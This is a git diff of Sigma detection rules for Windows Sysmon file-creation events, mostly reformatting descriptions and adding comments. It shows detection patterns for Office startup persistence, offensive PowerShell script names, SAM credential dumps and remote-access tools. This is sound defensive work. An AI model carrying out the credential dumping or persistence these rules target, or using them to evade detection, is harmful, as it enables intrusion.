a/sigma/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml @@ -1,8 +1,8 @@ title: New Outlook Macro Created id: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 related: - - id: 117d3d3a-755c-4a61-b23e-9171146d094c - type: derived + - id: 117d3d3a-755c-4a61-b23e-9171146d094c + type: derived status: test description: Detects the creation of a macro file for Outlook. references: diff --git a/sigma/sysmon/file/file_event/file_event_win_office_outlook_newform.yml b/sigma/sysmon/file/file_event/file_event_win_office_outlook_newform.yml index 42329c83c..4cf3bf47d 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_outlook_newform.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_outlook_newform.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Outlook Form id: c3edc6a5-d9d4-48d8-930e-aab518390917 status: test -description: Detects the creation of a new Outlook form which can contain malicious - code +description: Detects the creation of a new Outlook form which can contain malicious code references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79 @@ -26,7 +25,7 @@ detection: Image|endswith: \outlook.exe TargetFilename|contains: - \AppData\Local\Microsoft\FORMS\IPM - - \Local Settings\Application Data\Microsoft\Forms + - \Local Settings\Application Data\Microsoft\Forms # Windows XP condition: file_event and selection falsepositives: - Legitimate use of outlook forms diff --git a/sigma/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml b/sigma/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml index 1287fd3b2..5cd7e2441 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml @@ -1,8 +1,8 @@ title: Suspicious Outlook Macro Created id: 117d3d3a-755c-4a61-b23e-9171146d094c related: - - id: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 - type: derived + - id: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 + type: derived status: test description: Detects the creation of a macro file for Outlook. references: diff --git a/sigma/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml b/sigma/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml index 2a76dfc95..1f7e79b3f 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml @@ -1,8 +1,7 @@ title: Publisher Attachment File Dropped In Suspicious Location id: 3d2a2d59-929c-4b78-8c1a-145dfe9e07b1 status: test -description: Detects creation of files with the ".pub" extension in suspicious or - uncommon locations. This could be a sign of attackers abusing Publisher documents +description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents references: - https://twitter.com/EmericNasi/status/1623224526220804098 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_office_startup_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_office_startup_persistence.yml index 417a2d998..514111969 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_startup_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_startup_persistence.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Microsoft Office Startup Folder id: 0e20c89d-2264-44ae-8238-aeeaba609ece status: test -description: Detects creation of Microsoft Office files inside of one of the default - startup folders in order to achieve persistence. +description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. references: - https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies - https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders @@ -21,11 +20,11 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection_word_paths: - - TargetFilename|contains: \Microsoft\Word\STARTUP - - TargetFilename|contains|all: - - \Office - - \Program Files - - \STARTUP + - TargetFilename|contains: \Microsoft\Word\STARTUP + - TargetFilename|contains|all: + - \Office + - \Program Files + - \STARTUP selection_word_extension: TargetFilename|endswith: - .doc @@ -35,11 +34,11 @@ detection: - .dotm - .rtf selection_excel_paths: - - TargetFilename|contains: \Microsoft\Excel\XLSTART - - TargetFilename|contains|all: - - \Office - - \Program Files - - \XLSTART + - TargetFilename|contains: \Microsoft\Excel\XLSTART + - TargetFilename|contains|all: + - \Office + - \Program Files + - \XLSTART selection_excel_extension: TargetFilename|endswith: - .xls @@ -51,8 +50,7 @@ detection: Image|endswith: - \WINWORD.exe - \EXCEL.exe - condition: file_event and ((all of selection_word_* or all of selection_excel_*) - and not filter_main_office) + condition: file_event and ((all of selection_word_* or all of selection_excel_*) and not filter_main_office) falsepositives: - Loading a user environment from a backup or a domain controller - Synchronization of templates diff --git a/sigma/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml b/sigma/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml index 35d5f9484..2f488c5fe 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml @@ -1,13 +1,11 @@ title: File With Uncommon Extension Created By An Office Application id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 status: experimental -description: Detects the creation of files with an executable or script extension - by an Office application. +description: Detects the creation of files with an executable or script extension by an Office application. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron - Systems) +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) date: 2021/08/23 modified: 2023/06/22 tags: @@ -18,6 +16,7 @@ logsource: product: windows category: file_event detection: + # Note: Please add more file extensions to the logic of your choice. file_event: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational @@ -47,7 +46,7 @@ detection: - .vbs - .wsf - .wsh - filter_optional_webservicecache: + filter_optional_webservicecache: # matches e.g. directory with name *.microsoft.com TargetFilename|contains|all: - C:\Users\ - \AppData\Local\Microsoft\Office\ @@ -62,8 +61,7 @@ detection: filter_main_localassembly: TargetFilename|contains: \AppData\Local\assembly\tmp\ TargetFilename|endswith: .dll - condition: file_event and (all of selection* and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: file_event and (all of selection* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml b/sigma/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml index cc829427c..3c88b8d69 100644 --- a/sigma/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml +++ b/sigma/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml @@ -1,8 +1,7 @@ title: Uncommon File Created In Office Startup Folder id: a10a2c40-2c4d-49f8-b557-1a946bc55d9d status: experimental -description: Detects the creation of a file with an uncommon extension in an Office - application startup folder +description: Detects the creation of a file with an uncommon extension in an Office application startup folder references: - https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/ - http://addbalance.com/word/startup.htm @@ -23,28 +22,28 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection_word_paths: - - TargetFilename|contains: \Microsoft\Word\STARTUP - - TargetFilename|contains|all: - - \Office - - \Program Files - - \STARTUP + - TargetFilename|contains: \Microsoft\Word\STARTUP + - TargetFilename|contains|all: + - \Office + - \Program Files + - \STARTUP filter_exclude_word_ext: TargetFilename|endswith: - - .docb - - .docm - - .docx - - .dotm - - .mdb - - .mdw - - .pdf - - .wll - - .wwl + - .docb # Word binary document introduced in Microsoft Office 2007 + - .docm # Word macro-enabled document; same as docx, but may contain macros and scripts + - .docx # Word document + - .dotm # Word macro-enabled template; same as dotx, but may contain macros and scripts + - .mdb # MS Access DB + - .mdw # MS Access DB + - .pdf # PDF documents + - .wll # Word add-in + - .wwl # Word add-in selection_excel_paths: - - TargetFilename|contains: \Microsoft\Excel\XLSTART - - TargetFilename|contains|all: - - \Office - - \Program Files - - \XLSTART + - TargetFilename|contains: \Microsoft\Excel\XLSTART + - TargetFilename|contains|all: + - \Office + - \Program Files + - \XLSTART filter_exclude_excel_ext: TargetFilename|endswith: - .xll @@ -64,9 +63,7 @@ detection: Image|endswith: - \winword.exe - \excel.exe - condition: file_event and (((selection_word_paths and not filter_exclude_word_ext) - or (selection_excel_paths and not filter_exclude_excel_ext)) and not 1 of - filter_main_*) + condition: file_event and (((selection_word_paths and not filter_exclude_word_ext) or (selection_excel_paths and not filter_exclude_excel_ext)) and not 1 of filter_main_*) falsepositives: - False positive might stem from rare extensions used by other Office utilities. level: high diff --git a/sigma/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml b/sigma/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml index 6c1e634b0..5b3e6a106 100644 --- a/sigma/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml @@ -1,8 +1,7 @@ title: Suspicious File Created In PerfLogs id: bbb7e38c-0b41-4a11-b306-d2a457b7ac2b status: experimental -description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". - Note that this directory mostly contains ".etl" files +description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files references: - Internal Research - https://labs.withsecure.com/publications/fin7-target-veeam-servers diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml index 5af4436d5..5ecaf853c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml +++ b/sigma/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml @@ -44,13 +44,13 @@ detection: - .dll - .exe filter_main_admin_temp: + # Example: C:\Windows\Temp\0DA9758B-4649-4969-9409-5CBDF193FB53\TransmogProvider.dll TargetFilename|startswith: C:\Windows\Temp\ TargetFilename|endswith: - .dll - .exe condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - - False positives will differ depending on the environment and scripts used. Apply - additional filters accordingly. + - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml index b60157d32..18631c582 100644 --- a/sigma/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml +++ b/sigma/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml @@ -1,9 +1,7 @@ title: PowerShell Script Dropped Via PowerShell.EXE id: 576426ad-0131-4001-ae01-be175da0c108 status: experimental -description: Detects PowerShell creating a PowerShell file (.ps1). While often times - this behavior is benign, sometimes it can be a sign of a dropper script trying - to achieve persistence. +description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence. references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: frack113 @@ -32,7 +30,6 @@ detection: TargetFilename|startswith: C:\Windows\Temp\ condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - - False positives will differ depending on the environment and scripts used. Apply - additional filters accordingly. + - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. level: low ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml index 502ee99dc..f06ad03cc 100644 --- a/sigma/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml +++ b/sigma/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml @@ -1,8 +1,8 @@ title: Malicious PowerShell Scripts - FileCreation id: f331aa1f-8c53-4fc3-b083-cc159bc971cb related: - - id: 41025fd7-0466-4650-a813-574aaacbe7f4 - type: similar + - id: 41025fd7-0466-4650-a813-574aaacbe7f4 + type: similar status: test description: Detects the creation of known offensive powershell scripts used for exploitation references: @@ -17,8 +17,8 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec - https://github.com/HarmJ0y/DAMP - https://github.com/samratashok/nishang - https://github.com/DarkCoderSc/PowerRunAsSystem/ @@ -26,8 +26,7 @@ references: - https://github.com/Kevin-Robertson/Powermad - https://github.com/adrecon/ADRecon - https://github.com/adrecon/AzureADRecon -author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, - Georg Lauenstein +author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein date: 2018/04/07 modified: 2023/04/17 tags: @@ -43,6 +42,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_generic: TargetFilename|endswith: + # Note: Please ensure alphabetical order when adding new entries - \Add-ConstrainedDelegationBackdoor.ps1 - \Add-Exfiltration.ps1 - \Add-Persistence.ps1 @@ -270,7 +270,7 @@ detection: - \WinPwn.ps1 - \WSUSpendu.ps1 selection_invoke_sharp: - TargetFilename|contains: Invoke-Sharp + TargetFilename|contains: Invoke-Sharp # Covers all "Invoke-Sharp" variants TargetFilename|endswith: .ps1 condition: file_event and (1 of selection_*) falsepositives: diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_module_creation.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_module_creation.yml index b71fb41b5..a87d83f93 100644 --- a/sigma/sysmon/file/file_event/file_event_win_powershell_module_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_powershell_module_creation.yml @@ -1,8 +1,7 @@ title: PowerShell Module File Created id: e36941d0-c0f0-443f-bc6f-cb2952eb69ea status: experimental -description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", - ".ps1", etc. +description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. references: - Internal Research - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml index 69f2d5e76..6580f78c5 100644 --- a/sigma/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml @@ -1,10 +1,7 @@ title: Potential Suspicious PowerShell Module File Created id: e8a52bbd-bced-459f-bd93-64db45ce7657 status: experimental -description: Detects the creation of a new PowerShell module in the first folder of - the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". - This is somewhat an uncommon practice as legitimate modules often includes a version - folder. +description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder. references: - Internal Research - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 @@ -22,11 +19,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|endswith: + # Note: Don't include PowerShell 7 as it has default modules that don't follow this logic - \\WindowsPowerShell\\Modules\\*\.ps - \\WindowsPowerShell\\Modules\\*\.dll condition: file_event and selection falsepositives: - - False positive rate will vary depending on the environments. Additional filters - might be required to make this logic usable in production. + - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production. level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml index 8867ab06d..66256a50a 100644 --- a/sigma/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml @@ -1,8 +1,7 @@ title: PowerShell Module File Created By Non-PowerShell Process id: e3845023-ca9a-4024-b2b2-5422156d5527 status: experimental -description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", - ".ps1", etc. by a non-PowerShell process +description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process references: - Internal Research - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3 @@ -27,10 +26,10 @@ detection: Image|endswith: - :\Program Files\PowerShell\7-preview\pwsh.exe - :\Program Files\PowerShell\7\pwsh.exe - - :\Windows\System32\poqexec.exe + - :\Windows\System32\poqexec.exe # https://github.com/SigmaHQ/sigma/issues/4448 - :\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe - :\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - - :\Windows\SysWOW64\poqexec.exe + - :\Windows\SysWOW64\poqexec.exe # https://github.com/SigmaHQ/sigma/issues/4448 - :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe - :\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe condition: file_event and (selection and not 1 of filter_main_*) diff --git a/sigma/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml b/sigma/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml index afee60c60..56e2db1ef 100644 --- a/sigma/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml +++ b/sigma/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml @@ -1,19 +1,11 @@ title: Potential Startup Shortcut Persistence Via PowerShell.EXE id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d status: test -description: 'Detects PowerShell writing startup shortcuts. - - This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently - observe adversaries using PowerShell to write malicious .lnk files into the startup - directory to establish persistence. - - Accordingly, this detection opportunity is likely to identify persistence mechanisms - in multiple threats. - - In the context of Yellow Cockatoo, this persistence mechanism eventually launches - the command-line script that leads to the installation of a malicious DLL" - - ' +description: | + Detects PowerShell writing startup shortcuts. + This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. + Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. + In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" references: - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder @@ -39,7 +31,6 @@ detection: TargetFilename|endswith: .lnk condition: file_event and selection falsepositives: - - Depending on your environment accepted applications may leverage this at times. - It is recommended to search for anomalies inidicative of malware. + - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware. level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml b/sigma/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml index d3cccd4c2..42c603426 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml +++ b/sigma/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml @@ -1,9 +1,7 @@ title: PSScriptPolicyTest Creation By Uncommon Process id: 1027d292-dd87-4a1a-8701-2abe04d7783c status: experimental -description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by - an uncommon process. This file is usually generated by Microsoft Powershell to - test against Applocker. +description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker. references: - https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml index 71da7e67a..e564c3df1 100644 --- a/sigma/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml @@ -19,6 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: + # Covers browsers - \brave.exe - \CCleaner Browser\Application\CCleanerBrowser.exe - \chromium.exe @@ -30,10 +31,12 @@ detection: - \Opera.exe - \Vivaldi.exe - \Whale.exe + # Covers email clients - \Outlook.exe - - \RuntimeBroker.exe + - \RuntimeBroker.exe # If the windows mail client is used - \Thunderbird.exe - - \Discord.exe + # Covers chat applications + - \Discord.exe # Should open the browser for download, but just in case. - \Keybase.exe - \msteams.exe - \Slack.exe diff --git a/sigma/sysmon/file/file_event/file_event_win_remcom_service.yml b/sigma/sysmon/file/file_event/file_event_win_remcom_service.yml index ee8a2f901..edd543cdf 100644 --- a/sigma/sysmon/file/file_event/file_event_win_remcom_service.yml +++ b/sigma/sysmon/file/file_event/file_event_win_remcom_service.yml @@ -1,8 +1,7 @@ title: RemCom Service File Creation id: 7eff1a7f-dd45-4c20-877a-f21e342a7611 status: test -description: Detects default RemCom service filename which indicates RemCom service - installation and execution +description: Detects default RemCom service filename which indicates RemCom service installation and execution references: - https://github.com/kavika13/RemCom/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml index 68f3cebce..c3d1e8c03 100644 --- a/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml @@ -1,18 +1,10 @@ title: ScreenConnect Temporary Installation Artefact id: fec96f39-988b-4586-b746-b93d59fd1922 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows author: frack113 @@ -29,7 +21,7 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetFilename|contains: \Bin\ScreenConnect. + TargetFilename|contains: \Bin\ScreenConnect. # pattern to dll and jar file condition: file_event and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml b/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml index b371ab7e7..a4f473abc 100644 --- a/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml @@ -1,17 +1,12 @@ title: Remote Access Tool - ScreenConnect Temporary File id: 0afecb6e-6223-4a82-99fb-bf5b981e92a5 related: - - id: b1f73849-6329-4069-bc8f-78a604bb8b23 - type: similar + - id: b1f73849-6329-4069-bc8f-78a604bb8b23 + type: similar status: experimental -description: 'Detects the creation of files in a specific location by ScreenConnect - RMM. - - ScreenConnect has feature to remotely execute binaries on a target machine. These - binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" - before execution. - - ' +description: | + Detects the creation of files in a specific location by ScreenConnect RMM. + ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. references: - https://github.com/SigmaHQ/sigma/pull/4467 author: Ali Alwashali @@ -33,5 +28,5 @@ detection: condition: file_event and selection falsepositives: - Legitimate use of ScreenConnect -level: low +level: low # Incrase the level if screenconnect is not used ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_ripzip_attack.yml b/sigma/sysmon/file/file_event/file_event_win_ripzip_attack.yml index 73e60e0dd..8ff70522c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_ripzip_attack.yml +++ b/sigma/sysmon/file/file_event/file_event_win_ripzip_attack.yml @@ -1,17 +1,10 @@ title: Potential RipZip Attack on Startup Folder id: a6976974-ea6f-4e97-818e-ea08625c52cb status: test -description: 'Detects a phishing attack which expands a ZIP file containing a malicious - shortcut. - - If the victim expands the ZIP file via the explorer process, then the explorer - process expands the malicious ZIP file and drops a malicious shortcut redirected - to a backdoor into the Startup folder. - - Additionally, the file name of the malicious shortcut in Startup folder contains - {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. - - ' +description: | + Detects a phishing attack which expands a ZIP file containing a malicious shortcut. + If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. + Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. references: - https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19 author: Greg (rule) @@ -28,7 +21,7 @@ detection: file_event: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational - selection: + selection: # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\target.lnk TargetFilename|contains|all: - \Microsoft\Windows\Start Menu\Programs\Startup - .lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D} diff --git a/sigma/sysmon/file/file_event/file_event_win_sam_dump.yml b/sigma/sysmon/file/file_event/file_event_win_sam_dump.yml index 1588fe7ce..04e61d035 100644 --- a/sigma/sysmon/file/file_event/file_event_win_sam_dump.yml +++ b/sigma/sysmon/file/file_event/file_event_win_sam_dump.yml @@ -1,8 +1,7 @@ title: Potential SAM Database Dump id: 4e87b8e2-2ee9-4b2a-a715-4727d297ece0 status: test -description: Detects the creation of files that look like exports of the local SAM - (Security Account Manager) +description: Detects the creation of files that look like exports of the local SAM (Security Account Manager) references: - https://github.com/search?q=CVE-2021-36934 - https://github.com/cube0x0/CVE-2021-36934 @@ -24,27 +23,27 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|endswith: - - \Temp\sam - - \sam.sav - - \Intel\sam - - \sam.hive - - \Perflogs\sam - - \ProgramData\sam - - \Users\Public\sam - - \AppData\Local\sam - - \AppData\Roaming\sam - - _ShadowSteal.zip - - \Documents\SAM.export - - :\sam - - TargetFilename|contains: - - \hive_sam_ - - \sam.save - - \sam.export - - \~reg_sam.save - - \sam_backup - - \sam.bck - - \sam.backup + - TargetFilename|endswith: + - \Temp\sam + - \sam.sav + - \Intel\sam + - \sam.hive + - \Perflogs\sam + - \ProgramData\sam + - \Users\Public\sam + - \AppData\Local\sam + - \AppData\Roaming\sam + - _ShadowSteal.zip # https://github.com/HuskyHacks/ShadowSteal + - \Documents\SAM.export # https://github.com/n3tsurge/CVE-2021-36934/ + - :\sam + - TargetFilename|contains: + - \hive_sam_ # https://github.com/FireFart/hivenightmare + - \sam.save + - \sam.export + - \~reg_sam.save + - \sam_backup + - \sam.bck + - \sam.backup condition: file_event and selection falsepositives: - Rare cases of administrative activity diff --git a/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml b/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml index fd277ee83..d7083d07d 100644 --- a/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml +++ b/sigma/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml @@ -1,8 +1,7 @@ title: Windows Shell/Scripting Application File Write to Suspicious Folder id: 1277f594-a7d1-4f28-a2d3-73af5cbeab43 status: experimental -description: Detects Windows shells and scripting applications that write files to - suspicious folders +description: Detects Windows shells and scripting applications that write files to suspicious folders references: - Internal Research author: Florian Roth (Nextron Systems) @@ -24,7 +23,7 @@ detection: - \bash.exe - \cmd.exe - \cscript.exe - - \msbuild.exe + - \msbuild.exe # 